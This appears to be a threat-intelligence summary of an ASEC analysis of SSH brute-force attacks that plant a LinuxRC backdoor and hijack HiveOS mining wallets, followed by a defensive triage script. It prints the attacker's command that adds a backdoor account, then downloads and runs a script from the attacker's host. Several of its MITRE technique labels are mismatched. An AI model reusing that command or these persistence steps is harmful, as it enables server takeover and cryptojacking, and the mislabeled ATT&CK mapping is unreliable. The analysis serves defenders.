Keypoints
- ASEC uses SSH-focused honeypots to monitor attacks on improperly managed Linux servers, notably HiveOS.
- Initial access is achieved via brute-force against exposed SSH services, after which attackers execute a downloaded Bash script named “run”.
- The “run” script creates a backdoor account, changes passwords, and overwrites authorized_keys to enable persistent SSH access.
- Attackers download and register a LinuxRC backdoor (“autofan” / autofan.service) and a mining configurator (“nvidia-conf” / overclock.service) as services.
- LinuxRC provides remote file operations, command execution, and reverse shell capabilities for persistent control.
- The attackers configure HiveOS to use GMiner and replace the miner wallet (wallet.conf) to mine Ravencoin (KawPow) to the attacker’s pool and wallet.
- Post-installation actions include deleting log files to hinder detection and maintaining access via SSH keys and service registration.
MITRE Techniques
- [T1078] Valid Accounts – Brute-force SSH access to exposed services: (‘scanned publicly exposed SSH services and attempted to log in through brute force attacks’).
- [T1203] Command and Scripting Interpreter – Use of Bash scripts to execute payloads: (‘downloads and executes a malicious Bash script named “run”’).
- [T1053] Scheduled Task/Job – Registering malicious payloads as services for persistence: (‘register them as a service’).
- [T1068] Exploitation for Privilege Escalation – Exploiting weak SSH configuration to gain higher access: (‘targeted the improperly managed SSH service’ / ‘exploit weaknesses in SSH configurations to gain elevated privileges’).
- [T1070] Indicator Removal on Host – Deleting logs to evade detection: (‘it deletes multiple log files’).
- [T1003] Credential Dumping / Credential Access – Changing account passwords and overwriting SSH keys to retain access: (‘changes the passwords for the “hive” and “user” accounts’ / ‘overwrites the “authorized_keys” file’).
- [T1071] Application Layer Protocol – Using SSH as a command-and-control channel: (‘use SSH for command and control over the compromised system’).
- [T1041] Exfiltration Over C2 Channel – Potential data exfiltration over the established SSH connection: (‘may exfiltrate data using the established SSH connection’).
Indicators of Compromise
- [MD5 hashes] payload identification – 1453e39da61777e617ff2da815905c63, 2d24ab3191541c45a12bde89ea12478f, and 2 more hashes.
- [URLs] payload and script hosting – hxxp://are[.]cloudns[.]org:12300/hfs/run, hxxp://are[.]cloudns[.]org:12300/hfs/miners/autofan, and other hosting URLs (3 more items).
- [IP address] command/source host – 222[.]103[.]211[.]25 (associated with the hosting domain for payloads).
- [Filenames / service names] deployed files and services – /tmp/run, autofan and autofan.service, nvidia-conf and overclock.service, wallet.conf (miner configuration), and additional scripts.
A successful brute-force login to exposed SSH services is followed by the attacker adding a “hive” user and downloading a launcher script. The observed initial command sequence includes creating the user with a salted password and fetching the runner:
sudo useradd -p `openssl passwd -1 -salt 'salt' IB223lW2` hive -u 1000 -o -g user -G user; sudo wget hxxp://are.cloudns[.]org:12300/hfs/run -O /tmp/run; sudo dos2unix /tmp/run; sudo chmod 777 /tmp/run; sudo /bin/bash /tmp/run
The fetched “run” script then resets passwords for the hive/user accounts and overwrites authorized_keys to install attacker-controlled SSH access.
The “run” script downloads two primary payload groups: a LinuxRC backdoor distributed as “autofan” with an accompanying autofan.service to register it as a system service, and a mining configurator “nvidia-conf” plus overclock.service to switch HiveOS’s miner configuration. LinuxRC (autofan) exposes commands for remote command execution (CMDSHELL/SHELL2), reverse shell (BACKDOOR), file browsing (EXPLORER), and file transfer (DOWNLOAD/UPLOAD), enabling full remote control beyond SSH access.
For cryptomining persistence, the attacker replaces the HiveOS miner wallet/config so GMiner (already present in HiveOS) mines KawPow (Ravencoin) to attacker-controlled endpoints; the injected wallet.conf specifies GMINER_ALGO="kawpow" and a mining pool/port (e.g., kawpow.auto.nicehash[.]com:9200). After installing services and payloads, scripts remove multiple log files to hinder forensic analysis and maintain access via the new account and SSH key.
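The artifacts above (a duplicate-UID “hive” account, the autofan/overclock service names, and a wallet.conf switched to KawPow and a foreign pool) lend themselves to a simple host triage. The following is an added example, not ASEC's code; its /etc/passwd, wallet.conf and unit-list inputs are constructed samples modelled on the page, and `expected_pool` is a hypothetical parameter for the operator's own pool.

```python
# Added triage helpers for the HiveOS/SSH intrusion pattern described above
# (not ASEC's code). All inputs below are constructed samples, not real captures.

# Constructed /etc/passwd: HiveOS "user" (uid 1000) plus the attacker's "hive"
# account created with `useradd -u 1000 -o`, i.e. a duplicate, non-unique UID.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
user:x:1000:1000::/home/user:/bin/bash
hive:x:1000:1000::/home/hive:/bin/bash
"""

# Constructed wallet.conf fragment modelled on the injected miner config.
SAMPLE_WALLET_CONF = """GMINER_ALGO="kawpow"
GMINER_URL="kawpow.auto.nicehash.com:9200"
"""

# Constructed unit names on the host; autofan/overclock are the ones the page reports.
SAMPLE_UNITS = ["ssh.service", "hive.service", "autofan.service", "overclock.service"]
SUSPICIOUS_UNITS = {"autofan.service", "overclock.service"}

def duplicate_uids(passwd_text):
    """Map each UID shared by more than one account to the account names."""
    by_uid = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3:
            by_uid.setdefault(fields[2], []).append(fields[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}

def parse_wallet_conf(conf_text):
    """Parse KEY="value" lines of a HiveOS wallet.conf into a dict."""
    kv = {}
    for line in conf_text.splitlines():
        if "=" in line and not line.lstrip().startswith("#"):
            key, _, value = line.partition("=")
            kv[key.strip()] = value.strip().strip('"')
    return kv

def triage(passwd_text, conf_text, unit_names, expected_pool):
    """Return findings; expected_pool (hypothetical) is the operator's own host:port."""
    findings = []
    for uid, names in duplicate_uids(passwd_text).items():
        findings.append(f"uid {uid} shared by accounts: {', '.join(names)}")
    for unit in sorted(set(unit_names) & SUSPICIOUS_UNITS):
        findings.append(f"suspicious systemd unit: {unit}")
    conf = parse_wallet_conf(conf_text)
    if conf.get("GMINER_URL") and conf["GMINER_URL"] != expected_pool:
        findings.append(f"wallet.conf pool changed to {conf['GMINER_URL']} "
                        f"(algo {conf.get('GMINER_ALGO', '?')})")
    return findings
```

On a live host, feed it the contents of /etc/passwd, the active wallet.conf and the output of `systemctl list-unit-files`; a clean host yields an empty list.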
Read more: https://asec.ahnlab.com/en/83857/